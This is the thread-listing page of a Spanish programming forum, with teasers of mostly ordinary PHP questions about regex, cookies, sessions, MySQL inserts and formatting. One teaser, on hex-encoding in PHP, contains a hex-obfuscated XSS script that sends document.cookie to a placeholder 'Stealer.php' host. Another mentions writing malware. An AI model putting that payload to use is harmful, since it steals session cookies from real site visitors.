• Publicidad

Fecha actual 2024-05-11 23:04 @003

News News of Programación en general

Site map of Programación en general » Foro : Programación en general

Todo lo relacionado con lenguajes de programación distintos de Perl: PHP, Java, C++, Ruby, Python, etc.

C vs C++

Hola. Estoy decidiendo aprender un lenguaje nuevo. Está entre C o C++. El tema es que ya encontré las librerías que necesito para usar peticiones web y expresiones regulares. El tema es que voy a traducir todos mis códigos a cualquiera de estos dos lenguajes. La temática sería esa: malware, peticiones web y expresiones regulares.

¿ Cuál me conviene aprender ?
Read more : C vs C++ | Vistas : 1905 | Respuestas : 2


Formateador para PHP

Hola, estoy buscando un formateador para PHP que pueda usar en Windows. Estoy usando los online pero no confío en que puedan quedar grabados los códigos formateados por eso busco uno para escritorio o uno que pueda usar en XAMPP. Probé PHPTidy pero no entiendo cómo se usa.

¿ Alguien conoce uno ?
Read more : Formateador para PHP | Vistas : 1730 | Respuestas : 1


Borrar todo lo que este entré [] en PHP

Hola, estoy tratando de borrar todo lo que esté entre corchetes en una cadena que tiene algo así dejando lo demás como está:

Test 123

quedando:

Test 123

Había pensado en usar expresiones regulares para buscar todos los corchetes pero quería preguntar si había una solución más efectiva.

¿ Alguien conoce alguna forma mejor ?
Read more : Borrar todo lo que este entré [] en PHP | Vistas : 1212 | Respuestas : 0


Cookies vs. sesiones en PHP

Hola, estoy buscando seguridad en PHP y estoy usando cookies. Quería preguntar si me convendría usar sesiones para mayor seguridad. ¿Qué opinan?
Read more : Cookies vs. sesiones en PHP | Vistas : 1860 | Respuestas : 3


Verificar file_get_contents

¿Como puedo verificar que file_get_contents existe en un servidor web?
Read more : Verificar file_get_contents | Vistas : 1392 | Respuestas : 0


Codificar en hexadecimal usando PHP

Hola, quería saber si alguien sabia cómo codificar en hexadecimal usando PHP quedando algo así:

%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
¿ Alguien sabe cómo hacerlo ?
Read more : Codificar en hexadecimal usando PHP | Vistas : 1697 | Respuestas : 1


Parsear Cookies en PHP

Hola. Estoy tratando de analizar cookies con PHP, encontré esta función pero PHP me dice que no existe: http://php.net/manual/es/function.http-parse-cookie.php Intenté improvisar a mi manera y casi lo tengo:

<?php

$line = "foo=bar; path=/; domain=example.com; comment=;";

$tokens = explode(" ", $line);
$tokens = array_map('trim', $tokens);

echo print_r($tokens);


?>
El tema es que captura todos los campos pero el problema es que no conozco la estructura de cómo se ven ...
Read more : Parsear Cookies en PHP | Vistas : 2042 | Respuestas : 4


Error en inserto de registros en PHP

Hola. Tengo un problema con PHP: cuando inserto registros usando MySQL, cuando uso el "insert to" para agregar contenido largo de códigos con muchos barras u otras cosas raras, hacen que el agregado de registros dé un error. Esto lo había arreglado usando addslashes(), pero después provocaba estragos cuando usaba stripslashes() para volcar el contenido y ver qué había arruinado el contenido con addslashes(). ¿Hay otra función para evitar errores en los insertos de registros ...
Read more : Error en inserto de registros en PHP | Vistas : 1663 | Respuestas : 2


El clásico leer completo

Hola. Estaba viendo la clásica función de "leer completo" que tienen todos los foros y traté de hacer lo mismo con un código HTML con muchas etiquetas que después se reemplazan. Lo hice con la función substr(). Clásicamente funciona bien si el código no tiene etiquetas pero en mi caso sí las tiene y cuando uso substr() corta las etiquetas delatando todo el código y mostrándose mal. Intenté todo pero siempre es igual.

¿ Hay ...
Read more : El clásico leer completo | Vistas : 1442 | Respuestas : 1


Ayuda con expresión regular en PHP

Hola. Estoy haciendo algo en PHP para reemplazar etiquetas en un string largo con muchos caracteres raros y otras cosas. El tema es que uso las etiquetas \ como en los foros, solo que en mi caso son multifunción, detectan imágenes, Youtube y códigos scripts. El código que tengo es el siguiente:

http://pastebin.com/gpzETUtx

El problema es que no puedo reemplazar toda la variable con un cómodo preg_replace porque tengo ...
Read more : Ayuda con expresión regular en PHP | Vistas : 3913 | Respuestas : 11


 

Identificarte  •  Registrarse


Estadísticas

Mensajes totales 36875 • Temas totales 7425 • Usuarios totales 1980